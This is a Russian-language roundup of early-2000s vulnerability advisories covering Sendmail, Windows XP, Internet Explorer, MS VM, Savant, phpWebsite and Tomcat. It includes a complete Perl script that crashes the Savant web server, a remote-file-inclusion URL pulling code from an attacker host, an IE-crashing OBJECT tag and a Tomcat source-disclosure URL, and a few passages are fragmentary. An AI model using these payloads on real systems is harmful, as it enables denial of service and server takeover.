Компания Internet Security Systems распространила предупреждение о наличии опаснейшей дыры в почтовом сервере Sendmail. Это самая популярная почтовая программа в мире, установленная, по разным данным, на 50-75% всех серверов электронной почты. Дыра имеется в коммерческих вариантах Sendmail версий от 5.79 до 8.12.7, а также в версиях программы с открытым кодом. Это уже не первая дыра в данной программе. Об уязвимостях в Sendmail сообщалось еще в 2001 г., а осенью прошлого года в одном из дистрибутивов программы был обнаружен замаскированный троян.

Дыра связана с ошибкой переполнения буфера, возникающей при проверке Sendmail заголовков электронных писем. Для анализа адресных полей заголовка (to, cc, from) служит функция crackaddr(), использующая для обработки данных статический буфер. Функция содержит средства проверки правильности обработки информации, однако одно из этих средств включает ошибку, приводящую к переполнению буфера. Используя эту ошибку, хакер может захватить полный контроль над сервером на самом верхнем уровне доступа (root).

Уязвимость обнаружена в Windows XP в Service Control Manager. Локальный пользователь может раскрыть чувствительную информацию.

Согласно сообщению, служба имеет ограниченное время (примерно 20 сек) между получением управляющего кода SERVICE_CONTROL_SHUTDOWN и фактического завершения работы системы. Служба может запросить у системы дополнительное время перед завершением работы. Однако, если служба не смогла полностью завершить работу в достаточное время, система запишет кэшируемые данные к открытым файлам службы. Кэшируемые данные могут включить информацию от файлов, к которым имеет доступ служба, в том числе доступные только администратору системы.

Локальный пользователь может читать такие файлы после перезагрузки системы, чтобы получить потенциально чувствительную информацию.
Уязвимость обнаружена в Windows XP

Ryan Emerle, ведущий системный разработчик из фирмы Interactive Network Systems, Inc. обнаружил уязвимость в MSIE версии 6.0, связанной с некорректной обработкой тэга OBJECT tag.
При сформировании специальной страницы, содержащей код:
object id="test" data="#" width="100%" height="100%" type="text/x-scriptlet" VIEWASTEXT>/object
происходит "сваливание" IE с закрытием всех сессий. Автор проверял уязвимость в Windows 2000 Pro SP3 с Internet Explorer 6.0.2800.1160 SP1. Как стало известно из дальнейшего обсуждения, также уязвима ОС - Windows XP SP1 с IE 6 SP1.

Обнаружено две новых уязвимости в продукции Microsoft. На сей раз проштрафились Microsoft Virtual Machine, Microsoft Proxy Server 2.0 и Microsoft ISA Server 2000.

Первая критическая дыра находится в Microsoft Virtual Machine (бюллетень MS03-011), а если еще точнее, то в ByteCode Verifier. Она позволяет хакеру использовать нелегальные последовательности кода для обхода проверки на безопасность кода. Последствия малоприятные: возможность атаки путем встроенного Java-апплета. Однажды продырявленный ByteCode Verifier позволяет хакеру запускать и другой код. Правда только в том случае, если у хакера есть активный аккаунт в системе.

Savant – бесплатный Web сервер с открытым исходным кодом для Windows 9x, ME, NT, 2000, и XP. 11 сентября в программе было обнаружено возможность удаленного переполнения бефера. Ниже код, эксплуатирующий эту уязвимость.

#!/usr/bin/perl
# Remote / Local buffer overflow for Savant Web Server 3.1 and previous
# As Described in the follow advisory FS Advisory ID: 091002-SVWS
# Crashes the daemon, no patch is yet available for this. 11th sept 02
# Author: ntfx
# Soldierx Security / Legion2000SR (c)
# Web: Soldierx.com
# Web: legion2000.security.nu
############################

use IO::Socket;
# THIS CODE IS A TOY, AN EXAMPLE. NOT SERIOUS.
$host=$ARGV[0];
$port=$ARGV[1];
$a=A;
# kat <3
if(! $ARGV[0])
{
&usage;
exit;
}

$dosme = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp');
$evilc0de = $a x 300;
print $dosme "GET /$evilc0de ";
sleep(3);
close($dosme);
print "Daemon should now be crashed";
sub usage() {
print "USAGE: perl $0 ";
print "Savant Web Server 3.1 Buffer Overflow ";
print "Legion2000SR http://legion2000.security.nu ";
print "SoldierX Security http://soldierx.com ";
exit(0);
}

Внедрение произвольного PHP кода в phpWebsite 0.8.2
Уязвимость, обнаруженная в phpWebsite,позволяет включать произвольный удаленный PHP файл в include_once.php сценарий. Уязвимость позволяет атакующему выполнять произвольные команды на Web сервере. Пример:

http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/

--- htmlheader.php --- " ?> .

Раскрытие исходного кода сценариев в Apache Tomcat
Сервлет "org.apache.catalina.servlets.DefaultServlet" включен в Apache Tomcat по умолчанию. Удаленный атакующий может использовать этот сервлет для просмотра содержания произвольных файлов в пределах WWWROOT, в т.ч. и .jsp файлов, которые могут содержать чувствительные данные, типа имен пользователей базы данных и паролей. Пример:

http://target/admin/servlet/org.apache.catalina.servlets.DefaultServlet/target.jsp

Уязвимость обнаружена в Apache Software Foundation Tomcat 3.0-4.1.10

Уязвимость проверки срока действия сертификата в Microsoft Internet Explorer
Уязвимость обнаружена в PKI, используемом Microsoft Internet Explorer для SSL. По сообщениям, браузер не предупреждает пользователя, если срок действия root CA сертификата истек. Это происходит, когда браузер имеет более новую версию CA сертификата. Вероятно уязвимость может лежать операционной системе, а не Internet Explorer. В этом случае, могут быть уязвимы и другие приложения.Уязвимость обнаружена в 5.5-6.0 sp1